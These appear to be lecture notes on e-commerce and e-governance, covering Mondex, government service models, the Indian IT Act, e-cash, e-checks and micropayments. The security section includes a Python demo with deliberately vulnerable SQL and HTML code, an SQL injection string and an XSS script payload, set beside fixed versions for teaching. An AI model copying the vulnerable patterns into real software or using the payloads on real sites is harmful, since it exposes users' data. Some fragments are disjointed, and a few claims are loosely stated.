The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. Mondex cards, however, contain an embedded microprocessor with sophisticated encryption methods and tamper-resistant hardware designed to protect them from attackers. The ability of the Mondex smart card to do offline transactions means it is less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they are actually recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage of Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to Mondex, the smart card system is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of the limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes its electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance -

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with taking this definition as congruent with e-governance is that it makes no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects have been hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India in PPP based e-governance projects; each such project involved a mammoth state wide area network in the state concerned.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been delivered. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government, and enhance citizens' economic and social opportunities so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere, through the network. This is possible because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit the CORBA specifications, any new Web application, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Database Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service API (GSS-API). While these technologies carry considerable weight, public key security with the Secure Sockets Layer (SSL, since superseded by TLS) is more popular for Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows

G2G (Government to Government)

In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through Internet, fax, telephone, email, face-to-face etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community, the providers of goods and services, to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. G2B initiatives can be transactional, such as licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses, enabling them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): refers to the conducting of transactions between government bodies and business via the Internet.

Business to government (B2G): professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

• Generally but not always involving

- Long Term Contracts

- User Charges and/or Payments flowing between the Parties

- Shared Investments but Mainly Private

- Risk Sharing by the Parties

• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them

• Fiscal Head Room

• As a Way of Financing the Project

• Separate Policy & Regulation from Operations

• Make the Good or Service Available

• Pay for Performance and Output

• Introduce Competition - For and In the Market

PREPARED BY ARUN PRATAP SINGH 48

48

The Need to Set the Right Priorities -

Four Basic Dimensions of P3

Although each is unique, all P3's include four basic characteristics:

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps


Crafting the Partnership

Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis

What's the need

What's driving the need / rationale

Facility non-compliance natural disaster budget deficit

Is there a need for a Public/Private Partnership


Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically: can it be done

Market Research

EconomicFinancial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project

Has the plan been thoroughly tested to assess market demand public and stakeholder

feedback and economics

Master ScheduleBudget

Political Climate

Any potential "fatal flaws" that could derail the project

Procurement and Contracting

How do you choose and contract with the best-value private partner

Whatrsquos the best delivery method

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow

Procurement Approach

Sole Source RFP Low Bid

Risk Allocation between Public and private Partners

Structuring of ContractRisks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index tend also to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all share broadly similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites, one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of a country's readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION. The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2. INFORMATION SECURITY. A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish policy and objectives for information security;

implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS;

continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.

Authorization: the capability to grant access rights to resources; the process of verifying that someone has the rights to do what they are trying to do.

Confidentiality: the capability to prevent unauthorized access to information.

Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.

Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.

Non-repudiation: the capability to prevent a person or system involved in an event or action from denying or challenging their participation in it.

Examples of organizational and technical measures to prevent unauthorized access and processing:

Protecting premises, equipment and systems software, including input-output units

Protecting software applications used to process personal data

Preventing unauthorized access to personal data during transmission, including transmission via telecommunication means and networks

Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data

Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and by whom, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Nevertheless, trusted security and privacy measures constitute a crucial success factor for e-Government that has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples of cyber attacks use techniques like packet sniffers, probes, malware, internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

- achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;
- maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;
- continually improve its control environment;
- effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries that were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
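As an added illustration (not code from the notes or from the research work cited), the Python program below places the two vulnerabilities named above beside their fixes: a lookup that pastes user input into an SQL string next to one that binds it as a parameter, and an HTML template that writes untrusted text raw next to one that escapes it. The citizen table, names and the probe inputs are constructed for the example.

```python
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for a citizen-records database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (id INTEGER PRIMARY KEY, name TEXT, tax_id TEXT)")
    conn.executemany(
        "INSERT INTO citizens (name, tax_id) VALUES (?, ?)",
        [("Asha Verma", "TAX-0001"), ("Rahul Mehta", "TAX-0002")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    # Deliberately vulnerable: the user-supplied value is pasted into the SQL
    # text, so a quote character in it changes the query instead of being data.
    sql = f"SELECT name, tax_id FROM citizens WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    # Hardened: the driver binds the parameter; whatever it contains is only
    # ever compared against the name column, never parsed as SQL.
    return conn.execute("SELECT name, tax_id FROM citizens WHERE name = ?", (name,)).fetchall()


def render_vulnerable(display_name: str) -> str:
    # Deliberately vulnerable: untrusted text is written into HTML unescaped,
    # so markup inside it is interpreted by the browser (reflected XSS).
    return f"<p>Welcome, {display_name}</p>"


def render_safe(display_name: str) -> str:
    # Hardened: escape for the HTML text context so the browser shows the
    # characters literally. (Attribute, URL and script contexts need their own
    # escaping rules; a templating engine with auto-escaping handles this.)
    return f"<p>Welcome, {html.escape(display_name, quote=True)}</p>"


if __name__ == "__main__":
    conn = make_db()
    probe = "x' OR '1'='1"   # constructed input containing a quote character
    print("vulnerable:", lookup_vulnerable(conn, probe))   # every row is returned
    print("safe:      ", lookup_safe(conn, probe))         # no such name: []
    tag = "<script>alert(1)</script>"                      # constructed input with markup
    print(render_vulnerable(tag))
    print(render_safe(tag))
```

Parameter binding and context-aware output escaping are the two fixes a reviewer expects to see for these findings; input validation is a useful extra layer but is not a substitute for either.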

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target, or a place of criminal activity, and it includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

- 121 million Internet users
- 65 million active Internet users, up by 28% from 51 million in 2010
- 50 million users shop online on e-commerce and online shopping sites
- 46+ million social network users
- 346 million mobile users had subscribed to data packages


CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

- secures access;
- downloads, copies or extracts any data, computer database or any information;
- introduces or causes to be introduced any virus or contaminant;
- disrupts or causes disruption;
- denies or causes denial of access to any person;
- provides any assistance to any person to facilitate access;
- charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43

- Destroys, deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means.
- Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person dishonestly or fraudulently does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to two three years, or with fine which may extend to five lakh rupees, or with both." [S66]

S 66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

- any information that is grossly offensive or has menacing character; or
- any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
- any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages;

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A - Punishment for publishing or transmitting of material containing sexually explicit act, etc., in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C - Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000, or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. User-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce.

Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences –

Section 65 – Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force.
Punishment: imprisonment up to three years, or/and with fine up to 2 lakh rupees.

Section 66 – Hacking.
Punishment: imprisonment up to three years, or/and with fine up to 5 lakh rupees.

Section 66-A – Sending offensive message through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages.
Punishment: imprisonment up to three years and with fine.

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers, because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


It is anonymous and reusable.

Electronic Cash Security

- Complex cryptographic algorithms prevent double spending.
- Anonymity is preserved unless double spending is attempted.
- Serial numbers can allow tracing to prevent money laundering.

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because in this case no credential such as a card password or anything similar is involved. It is simply an online fund transfer from the customer's account to the trader's account.


However, while accessing the customer's account, the customer must keep in mind internet security sweeps or theft. Online hacking and cracking can be avoided by using SSL and TLS website security systems, keeping the website link on the safe "https" protocol, and running proper internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

- We can transfer funds, purchase stocks and use a variety of other services without having to handle physical cash or cheques.
- Electronic cash protects its user against theft. With electronic cash the customer does not need to provide financial information.
- E-cash supports small payments. Other online payment systems charge a fee for every transaction, no matter how high or low it is, but e-cash has a specific limit for additional charges; that is why very low payments are not charged a fee.

Limitations

- However secure the e-cash payment system is, no one is safe against online fraud. In this case the trader is referred to as fraudulent: the trader may take the amount but not provide the services.
- While making the payment it is very important that the internet connection and power supply are active. If the payment is in process and the internet supply fails in between, it can lead to loss of information, i.e. the amount will be charged but will not reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.
- E-Cash is not for everyone. Low income segments without computer and internet access are unable to enjoy the usage of E-Cash.

The rise of E-Cash is inevitable, but further improvements are needed. Tackling security, anonymity, low income group readiness and technology reliability issues will make E-Cash more perfect. Countries such as India, where people were hesitant to use such methods, have shown a tremendous rise in the use of online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.


E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal will print a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster: clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately, electronically, through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments, and business-to-business payments.


Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more:

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.
2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.
3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.
4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks.
5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features:

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. Also known as digital certificates, digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender. They're used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because digital signatures are difficult to tamper with or imitate and are easily transportable, they're a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message. With electronic check conversion, the private key is a secret mathematical calculation used to create the digital signature on the echeck, and the public key is the key given to anyone who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with.
2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.
3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible:

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.
2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.
3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.
4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. Payer (customer/bill payer) is prompted to authorize electronic debit and to enter bank routing number (ABA) and account number.
2. Merchant's sales system securely transfers order information to CyberSource over the Internet.
3. CyberSource forwards bank routing number and account number to processor.
4. The routing number and account number are validated and the integrity of the account's checking history is verified. Processor forwards approve/decline results to CyberSource.
5. CyberSource returns approval/decline message to merchant.
6. If approved, CyberSource routes check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.

Four Different Scenarios of the FSTC E-check System –


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as the micropayment method, is emerging to cater for very low value transactions. Examples:

- Millicent (pre-payment/credit based)
- PayWord (post-payment)


MICRO PAYMENT IS -

- Very small payments made over the Web
- Transactions too small for credit cards
- Can be as little as a fraction of a cent
- Alternative to subscription and advertising
- Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.
